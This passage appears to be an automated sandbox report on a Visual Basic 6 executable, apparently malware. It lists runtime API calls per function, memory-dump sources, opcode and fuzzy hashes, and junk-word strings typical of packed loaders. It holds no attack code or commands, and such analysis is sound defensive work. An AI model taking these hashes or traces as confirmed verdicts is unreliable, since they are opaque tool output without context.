                                                • __vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D65E
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D685
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000000,00000000), ref: 0041D69B
                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 0041D6A9
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,00000000,00000000), ref: 0041D6D7
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D710
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 0041D754
                                                • #717.MSVBVM60(?,00000008,00000080,00000000), ref: 0041D7A0
                                                • __vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000), ref: 0041D7B3
                                                • __vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7C3
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7CB
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7E0
                                                • __vbaOnError.MSVBVM60(000000FF), ref: 0041D7F1
                                                • __vbaSetSystemError.MSVBVM60(000000FF), ref: 0041D802
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D821
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D85A
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E8), ref: 0041D8A7
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D8CE
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D907
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001F0), ref: 0041D954
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041D97B
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D9B4
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000E0), ref: 0041DA01
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DA91
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,00401356), ref: 0041DAB3
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DAEC
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041DB39
                                                • __vbaFreeObj.MSVBVM60 ref: 0041DB75
                                                • __vbaStrCopy.MSVBVM60 ref: 0041DB89
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,000006F8), ref: 0041DBD8
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00403900,000006F8), ref: 0041DBEF
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DC0E
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DC47
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C70,00000060), ref: 0041DC8E
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DCB5
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DCEE
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041DD38
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DD5F
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DD98
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041DDE5
                                                • __vbaFreeStr.MSVBVM60 ref: 0041DE38
                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DE4B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,000006FC), ref: 0041DE91
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DEC8
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF01
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CDC,00000048), ref: 0041DF45
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041DF6C
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DFA5
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000F8), ref: 0041DFF2
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C70,000000F8), ref: 0041E02A
                                                • __vbaStrMove.MSVBVM60 ref: 0041E07D
                                                • __vbaFreeStr.MSVBVM60 ref: 0041E085
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E094
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041E0B6
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E0EF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000130), ref: 0041E139
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E15B
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E176
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E1AF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E0), ref: 0041E1F9
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E220
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E25C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E2A9
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E2D3
                                                • __vbaStrVarMove.MSVBVM60(?), ref: 0041E2DF
                                                • __vbaStrMove.MSVBVM60(?), ref: 0041E2E9
                                                • __vbaStrMove.MSVBVM60 ref: 0041E329
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E338
                                                • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041E355
                                                • __vbaFreeVar.MSVBVM60 ref: 0041E363
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E382
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E3BB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000120), ref: 0041E408
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E42F
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E468
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000140), ref: 0041E4B5
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000700), ref: 0041E52D
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E554
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E576
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E5AF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000180), ref: 0041E5FC
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E623
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E65C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000160), ref: 0041E6A6
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E6C8
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E6E3
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E71F
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000108), ref: 0041E76C
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E793
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E7CF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000D8), ref: 0041E81C
                                                • __vbaI4Var.MSVBVM60(?,?,?), ref: 0041E85E
                                                • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041E89A
                                                • __vbaFreeVar.MSVBVM60 ref: 0041E8A8
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041E8C7
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E900
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000130), ref: 0041E94A
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E96C
                                                • __vbaStrCopy.MSVBVM60 ref: 0041E97C
                                                • __vbaStrVarMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E9AB
                                                • __vbaStrMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E9B5
                                                • __vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041E9F1
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041EA03
                                                • __vbaFreeVar.MSVBVM60 ref: 0041EA11
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041EA30
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA69
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041EAB6
                                                • __vbaStrCopy.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041EAE0
                                                • __vbaStrCopy.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041EAED
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000704), ref: 0041EB40
                                                • __vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EB5E
                                                • __vbaFreeObj.MSVBVM60 ref: 0041EB69
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403900,00000708), ref: 0041EBAC
                                                • __vbaFreeVar.MSVBVM60(00000000,?,00403900,00000708), ref: 0041EBC6
                                                • __vbaFreeStr.MSVBVM60(0041EC8D), ref: 0041EC41
                                                • __vbaFreeStr.MSVBVM60(0041EC8D), ref: 0041EC49
                                                • __vbaFreeStr.MSVBVM60(0041EC8D), ref: 0041EC51
                                                • __vbaFreeStr.MSVBVM60(0041EC8D), ref: 0041EC59
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041EC8D), ref: 0041EC64
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0041EC8D), ref: 0041EC6F
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EC8D), ref: 0041EC77
                                                • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0041EC8D), ref: 0041EC7F
                                                • __vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EC8D), ref: 0041EC87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$New2$List$Move$CopyError$CallLateSystem$Ansi$Destruct$#517#618#692#711#712#717ChkstkPrintVar2
                                                • String ID: 2$Apparat5$Bakteriers$Bovlamme1$Calelectricity$Hvepsetaljer$INDUSTRIALIZING$Koaguleringerne7$STYRETABELLER$Tosdede8$Tvivlsomst9$Unecliptic9$Zombie3$phrontisterium$stivstikkere$T
                                                • API String ID: 2704859531-1304991006
                                                • Opcode ID: 281dee13229f254eedd803ed44214d2e80dacb2d8d5eb23c598ea3a72d8c7a0e
                                                • Instruction ID: 746630fc1e0685765ed0ff4df3edb0a592c2cb08473db643ca23f0a28894ce68
                                                • Opcode Fuzzy Hash: 281dee13229f254eedd803ed44214d2e80dacb2d8d5eb23c598ea3a72d8c7a0e
                                                • Instruction Fuzzy Hash: 4D03F571940228AFDB20DF60CC45FDDB7B9BB48304F1044EAE50ABB2A1DB795A85DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F0DD, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F0F8
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F110
                                                • __vbaAryConstruct2.MSVBVM60(?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F120
                                                • #690.MSVBVM60(ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F139
                                                • __vbaNew2.MSVBVM60(00403258,00422010,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002,?,?,?,?,00401356), ref: 0041F151
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F17E
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001F0,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F1B3
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F1CE
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F1E6
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F213
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000098,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F248
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4,00000002), ref: 0041F264
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F27C
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F2A9
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000178,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F2DE
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EA4), ref: 0041F2FF
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F317
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F344
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000098), ref: 0041F379
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F39B
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F3C2
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F3EF
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F424
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F446
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041F45E
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F48B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F4C0
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F4E2
                                                • #598.MSVBVM60(00000000,?,00403CDC,000000F8), ref: 0041F4E7
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041F4FF
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041F52C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F561
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041F580
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041F5AF), ref: 0041F5A1
                                                • __vbaFreeStr.MSVBVM60(00000000,?,0041F5AF), ref: 0041F5A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresultNew2$#598#690ChkstkConstruct2CopyDestruct
                                                • String ID: Confabulatory$Eksperimenternes$Finansierings$ministerstormens
                                                • API String ID: 2817960149-3291121498
                                                • Opcode ID: 6bbc6c85309f71df09639321d5ccc7d5b9a840c17ed58eb0b53194b6c26dc8c1
                                                • Instruction ID: dc7a06f849091209a17f9f8e9128b30eace9e4d4fc1af23c1fb516215e294887
                                                • Opcode Fuzzy Hash: 6bbc6c85309f71df09639321d5ccc7d5b9a840c17ed58eb0b53194b6c26dc8c1
                                                • Instruction Fuzzy Hash: 29E10D74A40208EFCB10EFA0D945FDDBBB5BF48704F20416AE502BB2A1DB796946DB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00420B6D, Relevance: 27.2, APIs: 18, Instructions: 219COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420B8B
                                                • __vbaAryConstruct2.MSVBVM60(?,00404064,00000011,?,?,?,?,00401356), ref: 00420BBA
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,00404064,00000011,?,?,?,?,00401356), ref: 00420BD2
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420C0B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001C8), ref: 00420C49
                                                • #698.MSVBVM60(?,?), ref: 00420C66
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?), ref: 00420C7E
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420CB7
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001E0), ref: 00420D01
                                                • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 00420D3A
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,00008008,?), ref: 00420D50
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401356), ref: 00420D62
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,?,?,?,00401356), ref: 00420D8C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 00420DE2
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 00420E3E
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 00420E5D
                                                • __vbaUbound.MSVBVM60(00000001,?), ref: 00420E68
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,00420EFE,?,?,?,?,?,00401356), ref: 00420EF8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$CheckHresult$FreeNew2$List$#698ChkstkConstruct2DestructUbound
                                                • String ID:
                                                • API String ID: 2830902964-0
                                                • Opcode ID: b1cba68350f8e2dbfa5b819c5aa13eee48bda66dabe639fa2df346ac97c3fbb5
                                                • Instruction ID: ab03deb15241b800030ba31e4d77aeb743f961349d6430976e8be470e44a0170
                                                • Opcode Fuzzy Hash: b1cba68350f8e2dbfa5b819c5aa13eee48bda66dabe639fa2df346ac97c3fbb5
                                                • Instruction Fuzzy Hash: 2CA11A71A00228EFDB10DFA4DD45F9DBBB5BF04304F5080AAE549B72A1DB785A84DF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00420F1D, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 00420F38
                                                • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401356), ref: 00420F51
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038D0,00000058), ref: 00420F7D
                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00420F98
                                                • #644.MSVBVM60(?,?,?), ref: 00420FA1
                                                • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420FB2
                                                • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00420FF1
                                                • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00421002
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038D0,000002B0), ref: 00421039
                                                • __vbaFreeObj.MSVBVM60(00421060), ref: 0042105A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
                                                • String ID:
                                                • API String ID: 1032928638-0
                                                • Opcode ID: 65bf029a01de7bba27d931c31f2f6d84e156ca6f9ebd0283c62dbd86fdeec8ce
                                                • Instruction ID: 721977d2c4274f3952fb5024921ab429620311e4c75838ddcefeed5339db2fd1
                                                • Opcode Fuzzy Hash: 65bf029a01de7bba27d931c31f2f6d84e156ca6f9ebd0283c62dbd86fdeec8ce
                                                • Instruction Fuzzy Hash: 3A413971900218EFDF01EF91D846BDEBBB5FF04744F50402AF901BB5A1C7B9AA459B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041ECAC, Relevance: 13.6, APIs: 9, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041ECC7
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 0041ECEC
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041ED19
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000058), ref: 0041ED48
                                                • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED6F
                                                • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED79
                                                • __vbaFreeObj.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED81
                                                • __vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED89
                                                • __vbaFreeStr.MSVBVM60(0041EDAF,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EDA9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$#704CheckChkstkHresultMoveNew2
                                                • String ID:
                                                • API String ID: 2174863854-0
                                                • Opcode ID: 685e41bdd2eba45e122c9e1a730b2baa12b7698a775f10bff7741f8c0ecc28d7
                                                • Instruction ID: c334c50bc2b15171cb770a7fd51dffa3d08109cb22feb594d7c83c1e4c1ccfb3
                                                • Opcode Fuzzy Hash: 685e41bdd2eba45e122c9e1a730b2baa12b7698a775f10bff7741f8c0ecc28d7
                                                • Instruction Fuzzy Hash: 7C313A70900219AFCB10EFA5DD46FDDBBB9BB45714F20022AF512B71E0DBB85945CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00421073, Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0042108F
                                                  • Part of subcall function 004212B8: __vbaChkstk.MSVBVM60(?,004210BE,?,?,?,?,00401356), ref: 004212BE
                                                  • Part of subcall function 004212B8: #644.MSVBVM60(?,?,004210BE,?,?,?,?,00401356), ref: 004212E8
                                                • __vbaVarMove.MSVBVM60 ref: 004210D2
                                                • __vbaVarMove.MSVBVM60 ref: 004210EB
                                                • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 004210FC
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 00421102
                                                • __vbaFreeVar.MSVBVM60(00421149), ref: 0042113B
                                                • __vbaFreeVar.MSVBVM60(00421149), ref: 00421143
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$ChkstkFreeMove$#644Idiv
                                                • String ID:
                                                • API String ID: 1258935826-0
                                                • Opcode ID: 71e9acd48078e496219baf3f4dadbb7a6ab66d869fea413db0716093a49b643c
                                                • Instruction ID: 98408869a60c80315d21267d28f891072e9e21220d1b57979d5bd87f06db05be
                                                • Opcode Fuzzy Hash: 71e9acd48078e496219baf3f4dadbb7a6ab66d869fea413db0716093a49b643c
                                                • Instruction Fuzzy Hash: 9C11BA71900248AFDB01EFD5C946BDEBBB8EF04744F50846AF506BB1A1D778AA05CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #100
                                                • String ID: VB5!6&*
                                                • API String ID: 1341478452-3593831657
                                                • Opcode ID: 985d6a041007ec0254a4684c830a8d77f4c038350f36810da5c65d95c77bbca9
                                                • Instruction ID: 299ab6c15a0e89de10d7515dfbc5a484ef9d34d6f3ecaf11ad68d13e4048bb2a
                                                • Opcode Fuzzy Hash: 985d6a041007ec0254a4684c830a8d77f4c038350f36810da5c65d95c77bbca9
                                                • Instruction Fuzzy Hash: 20D0B60189E3C20EE30322720A221462F700C6366035B00E780C6DE4E3C0AC48498336
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403B70, Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2160a1be3dd9e0126492cc9f24db11b759abfcc061b842b9d801c90ee066058d
                                                • Instruction ID: 2400bcde756f61f66d150663aae1087dae926c0d3ba6f1f4cb37a3568306de73
                                                • Opcode Fuzzy Hash: 2160a1be3dd9e0126492cc9f24db11b759abfcc061b842b9d801c90ee066058d
                                                • Instruction Fuzzy Hash: 7DB09220384242BAE6149AA8988192436A4E2007C53A00832F820E21D1C6B8AB00862D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403A78, Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
